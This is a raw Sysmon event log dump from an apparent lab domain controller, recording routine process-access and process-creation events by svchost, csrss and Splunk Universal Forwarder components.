13:50:46.461{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008362Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:46.461{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008361Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:46.461{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008360Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:46.461{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008359Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:46.461{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008358Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:46.461{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008357Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:46.461{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008356Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:46.461{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008355Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:46.461{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9236-6005-1B04-00000000A301}4648C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008354Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:46.461{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9236-6005-1B04-00000000A301}4648C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008353Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:46.322{59A5CD1D-9236-6005-1B04-00000000A301}4648C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008400Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.977{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9237-6005-1F04-00000000A301}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008399Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.977{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008398Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:47.977{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008397Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.977{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008396Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:47.977{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008395Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.977{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008394Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:47.977{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008393Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.977{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008392Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:47.977{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008391Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.977{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008390Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.977{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9237-6005-1F04-00000000A301}3180C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008389Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.977{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9237-6005-1F04-00000000A301}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000008388Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.978{59A5CD1D-9237-6005-1F04-00000000A301}3180C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008387Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.555{59A5CD1D-9237-6005-1E04-00000000A301}40523104C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008386Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:47.414{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9237-6005-1E04-00000000A301}4052C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008385Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
